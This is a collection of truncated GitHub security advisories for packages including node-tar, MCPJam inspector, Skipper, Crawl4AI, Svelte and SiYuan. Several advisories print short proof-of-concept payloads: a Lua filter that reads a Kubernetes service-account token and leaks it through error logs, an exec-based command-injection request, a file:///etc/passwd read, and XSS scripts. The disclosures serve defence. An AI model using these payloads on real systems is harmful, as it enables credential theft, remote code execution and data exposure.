GHSA-8qq5-rm4j-mr97: node-tar is Vulnerable to Arbitrary File Overwrite and Symlink Poisoning via Insufficient Path Sanitization

### Summary

The `node-tar` library (`<= 7.5.2`) fails to sanitize the `linkpath` of `Link` (hardlink) and `SymbolicLink` entries when `preservePaths` is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to **Arbitrary File Overwrite** via hardlinks and **Symlink Poisoning** via absolute symlink targets.

### Details

The vulnerability exists in `src/unpack.ts` within the `[HARDLINK]` and `[SYMLINK]` methods.

**1. Hardlink Escape (Arbitrary File Overwrite)**

The extraction logic uses `path.resolve(this.cwd, entry.linkpath)` to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (`entry.linkpath`) is an **absolute path**, `path.resolve` ignores the first argument (`this.cwd`) entirely and returns the absolute path. The library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the h...

GHSA-232v-j27c-5pp6: REC in MCPJam inspector due to HTTP Endpoint exposes

### Summary

MCPJam inspector is the local-first development platform for MCP servers. The latest version, 1.4.2, and earlier versions are vulnerable to a remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. This vulnerability is similar to CVE-2025-49596, but more severe. While CVE-2025-49596 requires tricking a user into clicking a malicious link, this vulnerability is exploitable with no user interaction. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.

### Details

MCPJam inspector binds to `0.0.0.0`, making its HTTP APIs remotely reachable.

```typescript
const server = serve({
  fetch: app.fetch,
  port: SERVER_PORT,
  hostname: "0.0.0.0",
});
```

The `/api/mcp/connect` API, which is intended for connecting to MCP servers, becomes an open entry point for unauthorized requests. Whe...

GHSA-53wg-r69p-v3r7: GraphQL Modules has a Race Condition issue

### Summary

Originally reported as an issue #2613 but should be elevated to a security issue as the ExecutionContext is often used to pass authentication tokens from incoming requests to services loading data from backend APIs.

### Details

When 2 or more parallel requests are made which trigger the same service, the context of the requests is mixed up in the service when the context is injected via `@ExecutionContext()`

### PoC

In a new project/folder, create and install the following `package.json`:

```json
{
  "name": "GHSA-53wg-r69p-v3r7",
  "scripts": {
    "test": "jest"
  },
  "dependencies": {
    "graphql-modules": "2.4.0"
  },
  "devDependencies": {
    "@babel/plugin-proposal-class-properties": "^7.18.6",
    "@babel/plugin-proposal-decorators": "^7.28.6",
    "babel-plugin-parameter-decorator": "^1.0.16",
    "jest": "^29.7.0",
    "reflect-metadata": "^0.2.2"
  }
}
```

with:

```
npm i
```

configure `babel.config.json` using:

```json
{
  "plugins": [
    ["@babel/plu...
```

GHSA-38cw-85xc-xr9x: Veramo is Vulnerable to SQL Injection in Veramo Data Store ORM

## Summary

An SQL injection vulnerability exists in the `@veramo/data-store` package that allows any authenticated user to execute arbitrary SQL queries against the database. The vulnerability is caused by insufficient validation of the `column` parameter in the `order` array of query requests.

## Details

`packages/data-store/src/data-store-orm.ts` (lines 416-434)

The vulnerability exists in the `decorateQB()` function which processes query ordering parameters:

```typescript
function decorateQB(
  qb: SelectQueryBuilder<any>,
  tableName: string,
  input: FindArgs<any>,
): SelectQueryBuilder<any> {
  if (input?.skip) qb = qb.offset(input.skip)
  if (input?.take) qb = qb.limit(input.take)
  if (input?.order) {
    for (const item of input.order) {
      qb = qb.addSelect(
        qb.connection.driver.escape(tableName) + '.' + qb.connection.driver.escape(item.column),
        item.column,
      )
      qb = qb.orderBy(qb.connection.driver.escape(item.column), item.direction)
    }
    ...
```

GHSA-cc8m-98fm-rc9g: Skipper is vulnerable to arbitrary code execution through lua filters

### Impact

Arbitrary code execution through [lua filters](https://opensource.zalando.com/skipper/reference/scripts/).

The default skipper configuration before v0.23 was `-lua-sources=inline,file`. The problem starts if untrusted users can create lua filters, because of `-lua-sources=inline`, for example through a Kubernetes Ingress resource. The configuration `inline` allows these users to create a script that is able to read the filesystem accessible to the skipper process, and if the user has access to read the logs they can read skipper secrets.

Kubernetes example (vulnerability is not limited to Kubernetes)

```lua
function request(ctx, params)
    local file = io.open('/var/run/secrets/kubernetes.io/serviceaccount/token', 'r')
    if file then
        local token = file:read('*all')
        file:close()
        error('[EXFIL] ' .. token) -- Exfiltrate via error logs
    end
end
```

### Patches

https://github.com/zalando/skipper/releases/tag/v0.23.0 disables Lua by default.

### Workarounds

You...

GHSA-gw32-9rmw-qwww: svelte is vulnerable to XSS with textarea bind:value

### Summary

A server-side rendered `<textarea>` with two-way bound value does not have its value correctly escaped in the rendered HTML.

### Details

In SSR, `<textarea bind:value={...}>` does not have its value escaped when it is rendered into the HTML as `<textarea>...</textarea>`.

### PoC

Put this in a server-side-rendered Svelte component:

```
<script>
  let value = `test'"></textarea><script` + `>alert('BIM');</sc` + `ript>`;
</script>

<textarea bind:value />
```

### Impact

- Only affects SSR
- Needs a `<textarea bind:value>` filled by user content via two-way binding

GHSA-qh8m-9qxx-53m5: CakePHP PaginatorHelper::limitControl() vulnerable to reflected cross-site-scripting

### Impact

The `PaginatorHelper::limitControl()` method has a cross-site-scripting vulnerability via query string parameter manipulation.

### Patches

This issue has been fixed in 5.2.12 and 5.3.1.

### Workarounds

If you are unable to upgrade, you should avoid using `Paginator::limitControl()` until you can upgrade.

GHSA-5882-5rx9-xgxp: Crawl4AI is Vulnerable to Remote Code Execution in Docker API via Hooks Parameter

A critical remote code execution vulnerability exists in the Crawl4AI Docker API deployment. The `/crawl` endpoint accepts a `hooks` parameter containing Python code that is executed using `exec()`. The `__import__` builtin was included in the allowed builtins, allowing attackers to import arbitrary modules and execute system commands.

**Attack Vector:**

```json
POST /crawl
{
  "urls": ["https://example.com"],
  "hooks": {
    "code": {
      "on_page_context_created": "async def hook(page, context, **kwargs):\n __import__('os').system('malicious_command')\n return page"
    }
  }
}
```

### Impact

An unauthenticated attacker can:

- Execute arbitrary system commands
- Read/write files on the server
- Exfiltrate sensitive data (environment variables, API keys)
- Pivot to internal network services
- Completely compromise the server

### Mitigation

1. **Upgrade to v0.8.0** (recommended)
2. If unable to upgrade immediately:
   - Disable the Docker API
   - Block `/crawl` endpoint ...

GHSA-vx9w-5cx4-9796: Crawl4AI Has Local File Inclusion in Docker API via file:// URLs

A local file inclusion vulnerability exists in the Crawl4AI Docker API. The `/execute_js`, `/screenshot`, `/pdf`, and `/html` endpoints accept `file://` URLs, allowing attackers to read arbitrary files from the server filesystem.

Attack Vector:

```json
POST /execute_js
{
  "url": "file:///etc/passwd",
  "scripts": ["document.body.innerText"]
}
```

Impact

An unauthenticated attacker can:

- Read sensitive files (/etc/passwd, /etc/shadow, application configs)
- Access environment variables via /proc/self/environ
- Discover internal application structure
- Potentially read credentials and API keys

Workarounds

1. Disable the Docker API
2. Add authentication to the API
3. Use network-level filtering

GHSA-pcjq-j3mq-jv5j: SiYuan Has a Stored Cross-Site Scripting (XSS) Vulnerability via Unrestricted SVG File Upload

### Summary

A Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan Note. The application does not sanitize uploaded SVG files. If a user uploads and views a malicious SVG file (e.g., imported from an untrusted source), arbitrary JavaScript code is executed in the context of their authenticated session.

### Details

The application allows authenticated users to upload files, including .svg images, without sanitizing the input to remove embedded JavaScript code (such as `<script>` tags or event handlers).

### PoC

1. Create a new "Daily note" in the workspace.
2. Create a file named test.svg with malicious JavaScript inside:

```
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 124 124" fill="none">
  <rect width="124" height="124" rx="24" fill="red"/>
  <script type="text/javascript">
    alert(window.origin);
  <...
```